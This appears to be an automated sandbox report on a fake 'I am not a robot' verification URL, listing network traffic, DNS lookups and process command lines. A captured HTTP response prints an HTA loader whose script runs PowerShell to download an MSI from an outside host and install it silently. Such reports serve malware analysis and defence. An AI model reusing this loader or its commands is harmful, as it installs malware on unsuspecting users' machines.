      Mar 25, 2025 16:07:00.848716974 CET49671443192.168.2.4204.79.197.203
      Mar 25, 2025 16:07:01.160865068 CET49671443192.168.2.4204.79.197.203
      Mar 25, 2025 16:07:01.770221949 CET49671443192.168.2.4204.79.197.203
      Mar 25, 2025 16:07:02.583834887 CET49711443192.168.2.4172.67.168.79
      Mar 25, 2025 16:07:02.583909035 CET44349711172.67.168.79192.168.2.4
      Mar 25, 2025 16:07:02.583992004 CET49711443192.168.2.4172.67.168.79
      Mar 25, 2025 16:07:02.585922956 CET49711443192.168.2.4172.67.168.79
      Mar 25, 2025 16:07:02.585972071 CET44349711172.67.168.79192.168.2.4
      Mar 25, 2025 16:07:02.811388016 CET44349711172.67.168.79192.168.2.4
      Mar 25, 2025 16:07:02.811477900 CET49711443192.168.2.4172.67.168.79
      Mar 25, 2025 16:07:02.813555956 CET49711443192.168.2.4172.67.168.79
      Mar 25, 2025 16:07:02.813565016 CET44349711172.67.168.79192.168.2.4
      Mar 25, 2025 16:07:02.813795090 CET44349711172.67.168.79192.168.2.4
      Mar 25, 2025 16:07:02.815093994 CET49711443192.168.2.4172.67.168.79
      Mar 25, 2025 16:07:02.856267929 CET44349711172.67.168.79192.168.2.4
      Mar 25, 2025 16:07:02.973316908 CET49671443192.168.2.4204.79.197.203
      Mar 25, 2025 16:07:03.425488949 CET44349711172.67.168.79192.168.2.4
      Mar 25, 2025 16:07:03.425616026 CET44349711172.67.168.79192.168.2.4
      Mar 25, 2025 16:07:03.425662994 CET49711443192.168.2.4172.67.168.79
      Mar 25, 2025 16:07:03.463568926 CET49711443192.168.2.4172.67.168.79
      Mar 25, 2025 16:07:03.463588953 CET44349711172.67.168.79192.168.2.4
      Mar 25, 2025 16:07:05.379590988 CET49671443192.168.2.4204.79.197.203
      Mar 25, 2025 16:07:09.613717079 CET49678443192.168.2.420.189.173.27
      Mar 25, 2025 16:07:09.925678968 CET49678443192.168.2.420.189.173.27
      Mar 25, 2025 16:07:10.269543886 CET49671443192.168.2.4204.79.197.203
      Mar 25, 2025 16:07:10.535098076 CET49678443192.168.2.420.189.173.27
      Mar 25, 2025 16:07:11.039748907 CET49729443192.168.2.4142.251.40.228
      Mar 25, 2025 16:07:11.039797068 CET44349729142.251.40.228192.168.2.4
      Mar 25, 2025 16:07:11.040081978 CET49729443192.168.2.4142.251.40.228
      Mar 25, 2025 16:07:11.040450096 CET49729443192.168.2.4142.251.40.228
      Mar 25, 2025 16:07:11.040469885 CET44349729142.251.40.228192.168.2.4
      Mar 25, 2025 16:07:11.258224964 CET44349729142.251.40.228192.168.2.4
      Mar 25, 2025 16:07:11.258353949 CET49729443192.168.2.4142.251.40.228
      Mar 25, 2025 16:07:11.279794931 CET49729443192.168.2.4142.251.40.228
      Mar 25, 2025 16:07:11.279822111 CET44349729142.251.40.228192.168.2.4
      Mar 25, 2025 16:07:11.280760050 CET44349729142.251.40.228192.168.2.4
      Mar 25, 2025 16:07:11.464273930 CET49729443192.168.2.4142.251.40.228
      Mar 25, 2025 16:07:11.738420963 CET49678443192.168.2.420.189.173.27
      Mar 25, 2025 16:07:14.144757032 CET49678443192.168.2.420.189.173.27
      Mar 25, 2025 16:07:17.254646063 CET4968180192.168.2.42.17.190.73
      Mar 25, 2025 16:07:17.567219019 CET4968180192.168.2.42.17.190.73
      Mar 25, 2025 16:07:17.572343111 CET49709443192.168.2.4131.253.33.254
      Mar 25, 2025 16:07:17.573333979 CET49709443192.168.2.4131.253.33.254
      Mar 25, 2025 16:07:17.573363066 CET49709443192.168.2.4131.253.33.254
      Mar 25, 2025 16:07:17.679639101 CET44349709131.253.33.254192.168.2.4
      Mar 25, 2025 16:07:17.679658890 CET44349709131.253.33.254192.168.2.4
      Mar 25, 2025 16:07:17.679737091 CET49709443192.168.2.4131.253.33.254
      Mar 25, 2025 16:07:17.679750919 CET44349709131.253.33.254192.168.2.4
      Mar 25, 2025 16:07:17.679785013 CET49709443192.168.2.4131.253.33.254
      Mar 25, 2025 16:07:17.680351973 CET44349709131.253.33.254192.168.2.4
      Mar 25, 2025 16:07:17.680358887 CET49709443192.168.2.4131.253.33.254
      Mar 25, 2025 16:07:17.680367947 CET44349709131.253.33.254192.168.2.4
      Mar 25, 2025 16:07:17.682145119 CET44349709131.253.33.254192.168.2.4
      Mar 25, 2025 16:07:17.682202101 CET49709443192.168.2.4131.253.33.254
      Mar 25, 2025 16:07:17.682739019 CET44349709131.253.33.254192.168.2.4
      Mar 25, 2025 16:07:17.686666965 CET49709443192.168.2.4131.253.33.254
      Mar 25, 2025 16:07:17.691430092 CET49709443192.168.2.4131.253.33.254
      Mar 25, 2025 16:07:17.783647060 CET44349709131.253.33.254192.168.2.4
      Mar 25, 2025 16:07:17.794574976 CET44349709131.253.33.254192.168.2.4
      Mar 25, 2025 16:07:17.799242973 CET44349709131.253.33.254192.168.2.4
      Mar 25, 2025 16:07:17.799257040 CET44349709131.253.33.254192.168.2.4
      Mar 25, 2025 16:07:17.799313068 CET49709443192.168.2.4131.253.33.254
      Mar 25, 2025 16:07:17.803919077 CET49680443192.168.2.4204.79.197.222
      Mar 25, 2025 16:07:17.804069042 CET49732443192.168.2.4204.79.197.222
      Mar 25, 2025 16:07:17.804106951 CET44349732204.79.197.222192.168.2.4
      Mar 25, 2025 16:07:17.804390907 CET49732443192.168.2.4204.79.197.222
      Mar 25, 2025 16:07:17.804641962 CET49732443192.168.2.4204.79.197.222
      Mar 25, 2025 16:07:17.804653883 CET44349732204.79.197.222192.168.2.4
      Mar 25, 2025 16:07:18.018505096 CET4973380192.168.2.4142.250.65.163
      Mar 25, 2025 16:07:18.114031076 CET49680443192.168.2.4204.79.197.222
      Mar 25, 2025 16:07:18.132497072 CET44349732204.79.197.222192.168.2.4
      Mar 25, 2025 16:07:18.132596016 CET49732443192.168.2.4204.79.197.222
      Mar 25, 2025 16:07:18.176588058 CET4968180192.168.2.42.17.190.73
      Mar 25, 2025 16:07:18.417299986 CET8049733142.250.65.163192.168.2.4
      Mar 25, 2025 16:07:18.417428970 CET4973380192.168.2.4142.250.65.163
      Mar 25, 2025 16:07:18.417584896 CET4973380192.168.2.4142.250.65.163
      Mar 25, 2025 16:07:18.517287016 CET8049733142.250.65.163192.168.2.4
      Mar 25, 2025 16:07:18.517301083 CET8049733142.250.65.163192.168.2.4
      Mar 25, 2025 16:07:18.525516033 CET4973380192.168.2.4142.250.65.163
      Mar 25, 2025 16:07:18.625844955 CET8049733142.250.65.163192.168.2.4
      Mar 25, 2025 16:07:18.676498890 CET4973380192.168.2.4142.250.65.163
      Mar 25, 2025 16:07:18.723375082 CET49680443192.168.2.4204.79.197.222
      Mar 25, 2025 16:07:18.957731009 CET49678443192.168.2.420.189.173.27
      Mar 25, 2025 16:07:19.382322073 CET4968180192.168.2.42.17.190.73
      Mar 25, 2025 16:07:19.879118919 CET49671443192.168.2.4204.79.197.203
      Mar 25, 2025 16:07:19.925981998 CET49680443192.168.2.4204.79.197.222
      Mar 25, 2025 16:07:21.243680954 CET44349729142.251.40.228192.168.2.4
      Mar 25, 2025 16:07:21.243740082 CET44349729142.251.40.228192.168.2.4
      Mar 25, 2025 16:07:21.243948936 CET49729443192.168.2.4142.251.40.228
      Mar 25, 2025 16:07:21.785588026 CET4968180192.168.2.42.17.190.73
      Mar 25, 2025 16:07:22.332438946 CET49680443192.168.2.4204.79.197.222
      Mar 25, 2025 16:07:22.772089958 CET49729443192.168.2.4142.251.40.228
      Mar 25, 2025 16:07:22.772121906 CET44349729142.251.40.228192.168.2.4
      Mar 25, 2025 16:07:26.599020004 CET4968180192.168.2.42.17.190.73
      Mar 25, 2025 16:07:27.145958900 CET49680443192.168.2.4204.79.197.222
      Mar 25, 2025 16:07:28.567886114 CET49678443192.168.2.420.189.173.27
      Mar 25, 2025 16:07:36.207706928 CET4968180192.168.2.42.17.190.73
      Mar 25, 2025 16:07:36.753501892 CET49680443192.168.2.4204.79.197.222
      Mar 25, 2025 16:08:10.974606991 CET49740443192.168.2.4142.251.40.228
      Mar 25, 2025 16:08:10.974637985 CET44349740142.251.40.228192.168.2.4
      Mar 25, 2025 16:08:10.974750996 CET49740443192.168.2.4142.251.40.228
      Mar 25, 2025 16:08:10.974931002 CET49740443192.168.2.4142.251.40.228
      Mar 25, 2025 16:08:10.974941015 CET44349740142.251.40.228192.168.2.4
      Mar 25, 2025 16:08:11.579662085 CET44349740142.251.40.228192.168.2.4
      Mar 25, 2025 16:08:11.580095053 CET49740443192.168.2.4142.251.40.228
      Mar 25, 2025 16:08:11.580121040 CET44349740142.251.40.228192.168.2.4
      Mar 25, 2025 16:08:19.255305052 CET4973380192.168.2.4142.250.65.163
      Mar 25, 2025 16:08:19.358488083 CET8049733142.250.65.163192.168.2.4
      Mar 25, 2025 16:08:19.358545065 CET4973380192.168.2.4142.250.65.163
      Mar 25, 2025 16:08:21.198204994 CET44349740142.251.40.228192.168.2.4
      Mar 25, 2025 16:08:21.198267937 CET44349740142.251.40.228192.168.2.4
      Mar 25, 2025 16:08:21.198381901 CET49740443192.168.2.4142.251.40.228
      Mar 25, 2025 16:08:22.772279978 CET49740443192.168.2.4142.251.40.228
      Mar 25, 2025 16:08:22.772313118 CET44349740142.251.40.228192.168.2.4
      Mar 25, 2025 16:08:49.051134109 CET49708443192.168.2.452.113.196.254
      TimestampSource PortDest PortSource IPDest IP
      Mar 25, 2025 16:07:02.457621098 CET5128453192.168.2.41.1.1.1
      Mar 25, 2025 16:07:02.577346087 CET53512841.1.1.1192.168.2.4
      Mar 25, 2025 16:07:06.769362926 CET53549651.1.1.1192.168.2.4
      Mar 25, 2025 16:07:06.856173038 CET53560281.1.1.1192.168.2.4
      Mar 25, 2025 16:07:07.583638906 CET53639721.1.1.1192.168.2.4
      Mar 25, 2025 16:07:10.932292938 CET5861553192.168.2.41.1.1.1
      Mar 25, 2025 16:07:10.932483912 CET5609153192.168.2.41.1.1.1
      Mar 25, 2025 16:07:11.037101984 CET53560911.1.1.1192.168.2.4
      Mar 25, 2025 16:07:11.038391113 CET53586151.1.1.1192.168.2.4
      Mar 25, 2025 16:07:24.549388885 CET53520551.1.1.1192.168.2.4
      Mar 25, 2025 16:07:43.255836964 CET53491591.1.1.1192.168.2.4
      Mar 25, 2025 16:08:06.298618078 CET53529991.1.1.1192.168.2.4
      Mar 25, 2025 16:08:06.300801039 CET53537371.1.1.1192.168.2.4
      Mar 25, 2025 16:08:09.260135889 CET138138192.168.2.4192.168.2.255
      Mar 25, 2025 16:08:09.381093025 CET53549681.1.1.1192.168.2.4
      Mar 25, 2025 16:08:36.171854973 CET53493511.1.1.1192.168.2.4
      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
      Mar 25, 2025 16:07:02.457621098 CET192.168.2.41.1.1.10x3a5aStandard query (0)serviceauthfoap.comA (IP address)IN (0x0001)false
      Mar 25, 2025 16:07:10.932292938 CET192.168.2.41.1.1.10x32ecStandard query (0)www.google.comA (IP address)IN (0x0001)false
      Mar 25, 2025 16:07:10.932483912 CET192.168.2.41.1.1.10xeb52Standard query (0)www.google.com65IN (0x0001)false
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Mar 25, 2025 16:07:02.577346087 CET1.1.1.1192.168.2.40x3a5aNo error (0)serviceauthfoap.com172.67.168.79A (IP address)IN (0x0001)false
      Mar 25, 2025 16:07:02.577346087 CET1.1.1.1192.168.2.40x3a5aNo error (0)serviceauthfoap.com104.21.94.136A (IP address)IN (0x0001)false
      Mar 25, 2025 16:07:11.037101984 CET1.1.1.1192.168.2.40xeb52No error (0)www.google.com65IN (0x0001)false
      Mar 25, 2025 16:07:11.038391113 CET1.1.1.1192.168.2.40x32ecNo error (0)www.google.com142.251.40.228A (IP address)IN (0x0001)false
      • serviceauthfoap.com
      • c.pki.goog
      Session IDSource IPSource PortDestination IPDestination Port
      0192.168.2.449733142.250.65.16380
      TimestampBytes transferredDirectionData
      Mar 25, 2025 16:07:18.417584896 CET202OUTGET /r/gsr1.crl HTTP/1.1
      Cache-Control: max-age = 3000
      Connection: Keep-Alive
      Accept: */*
      If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT
      User-Agent: Microsoft-CryptoAPI/10.0
      Host: c.pki.goog
      Mar 25, 2025 16:07:18.517301083 CET223INHTTP/1.1 304 Not Modified
      Date: Tue, 25 Mar 2025 14:39:48 GMT
      Expires: Tue, 25 Mar 2025 15:29:48 GMT
      Age: 1650
      Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT
      Cache-Control: public, max-age=3000
      Vary: Accept-Encoding
      Mar 25, 2025 16:07:18.525516033 CET200OUTGET /r/r4.crl HTTP/1.1
      Cache-Control: max-age = 3000
      Connection: Keep-Alive
      Accept: */*
      If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
      User-Agent: Microsoft-CryptoAPI/10.0
      Host: c.pki.goog
      Mar 25, 2025 16:07:18.625844955 CET223INHTTP/1.1 304 Not Modified
      Date: Tue, 25 Mar 2025 14:30:24 GMT
      Expires: Tue, 25 Mar 2025 15:20:24 GMT
      Age: 2214
      Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
      Cache-Control: public, max-age=3000
      Vary: Accept-Encoding


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.2.449711172.67.168.794437792C:\Windows\SysWOW64\wget.exe
      TimestampBytes transferredDirectionData
      2025-03-25 15:07:02 UTC198OUTGET /%20 HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
      Accept: */*
      Accept-Encoding: identity
      Host: serviceauthfoap.com
      Connection: Keep-Alive
      2025-03-25 15:07:03 UTC884INHTTP/1.1 200 OK
      Date: Tue, 25 Mar 2025 15:07:03 GMT
      Content-Type: application/octet-stream
      Content-Length: 758
      Connection: close
      Last-Modified: Mon, 24 Mar 2025 18:01:55 GMT
      ETag: "67e19e13-2f6"
      Accept-Ranges: bytes
      cf-cache-status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FnQ%2BeZwYOivMn1MDyQYo7f%2FWsEC%2FRU2f0J%2B3%2FtLeGCSElwMji5J9qeZikIquYIvQ97i0nVWREZzP7%2FItoTHfMiSCgMYWCkQPd5SvsnJP12TFiXzD55WIJM01XbqmoK58R4m538%2Fg"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 925f50cfce5c7d0b-EWR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=104916&min_rtt=103802&rtt_var=23582&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2850&recv_bytes=785&delivery_rate=34728&cwnd=246&unsent_bytes=0&cid=ff235a7a36b65a9b&ts=630&x=0"
      2025-03-25 15:07:03 UTC485INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 68 74 61 3a 61 70 70 6c 69 63 61 74 69 6f 6e 0a 20 20 20 20 20 20 20 20 69 64 3d 22 6f 48 54 41 22 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3d 22 74 68 69 6e 22 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 73 74 79 6c 65 3d 22 6e 6f 72 6d 61 6c 22 0a 20 20 20 20 20 20 20 20 63 6f 6e 74 65 78 74 6d 65 6e 75 3d 22 6e 6f 22 0a 20 20 20 20 20 20 20 20 6d 61 78 69 6d 69 7a 65 62 75 74 74 6f 6e 3d 22 6e 6f 22 0a 20 20 20 20 20 20 20 20 6d 69 6e 69 6d 69 7a 65 62 75 74 74 6f 6e 3d 22 6e 6f 22 0a 20 20 20 20 20 20 20 20 6e 61 76 69 67 61 62 6c 65 3d 22 6e 6f 22 0a 20 20 20 20 20 20 20 20 73 63 72 6f 6c 6c 3d 22 6e 6f 22 0a 20 20 20 20 20 20 20 20 73 68 6f
      Data Ascii: <!DOCTYPE html><html><head> <hta:application id="oHTA" border="thin" borderstyle="normal" contextmenu="no" maximizebutton="no" minimizebutton="no" navigable="no" scroll="no" sho
      2025-03-25 15:07:03 UTC273INData Raw: 72 6e 20 74 72 75 65 7d 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 76 61 72 20 73 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 3b 73 2e 52 75 6e 28 27 70 6f 77 65 72 73 68 65 6c 6c 20 2d 63 20 22 69 77 72 20 68 74 74 70 73 3a 2f 2f 6f 77 6e 6c 69 66 65 66 6f 72 79 6f 75 77 69 74 68 6d 65 2e 63 6f 6d 2f 70 6c 6f 20 2d 4f 75 74 46 69 6c 65 20 43 3a 5c 5c 55 73 65 72 73 5c 5c 50 75 62 6c 69 63 5c 5c 61 62 63 2e 6d 73 69 3b 20 6d 73 69 65 78 65 63 20 2f 69 20 43 3a 5c 5c 55 73 65 72 73 5c 5c 50 75 62 6c 69 63 5c 5c 61 62 63 2e 6d 73 69 20 2f 71 6e 22 27 2c 30 2c 74 72 75 65 29 3b 77 69 6e 64 6f 77 2e 63 6c 6f 73 65 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79
      Data Ascii: rn true}</script><script>var s=new ActiveXObject("WScript.Shell");s.Run('powershell -c "iwr https://ownlifeforyouwithme.com/plo -OutFile C:\\Users\\Public\\abc.msi; msiexec /i C:\\Users\\Public\\abc.msi /qn"',0,true);window.close();</script></head><body


      050100s020406080100

      Click to jump to process

      Click to jump to process

      • File
      • Network

      Click to dive into process behavior distribution

      Target ID:0
      Start time:11:07:01
      Start date:25/03/2025
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://serviceauthfoap.com/%20#%20I%20am%20not%20a%20robot:%20Cloudflare%20Verification%20ID:%2077FA-YOX" > cmdline.out 2>&1
      Imagebase:0xc70000
      File size:236'544 bytes
      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:true

      Target ID:1
      Start time:11:07:01
      Start date:25/03/2025
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff62fc20000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:true

      Target ID:2
      Start time:11:07:01
      Start date:25/03/2025
      Path:C:\Windows\SysWOW64\wget.exe
      Wow64 process (32bit):true
      Commandline:wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://serviceauthfoap.com/%20#%20I%20am%20not%20a%20robot:%20Cloudflare%20Verification%20ID:%2077FA-YOX"
      Imagebase:0x400000
      File size:3'895'184 bytes
      MD5 hash:3DADB6E2ECE9C4B3E1E322E617658B60
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:true
      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

      Target ID:4
      Start time:11:07:03
      Start date:25/03/2025
      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\download\ .1.html
      Imagebase:0x7ff786830000
      File size:3'388'000 bytes
      MD5 hash:E81F54E6C1129887AEA47E7D092680BF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:false

      Target ID:5
      Start time:11:07:04
      Start date:25/03/2025
      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1920,i,4755734750028850697,7347962626480152968,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=1948 /prefetch:3
      Imagebase:0x7ff786830000
      File size:3'388'000 bytes
      MD5 hash:E81F54E6C1129887AEA47E7D092680BF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:false

      No disassembly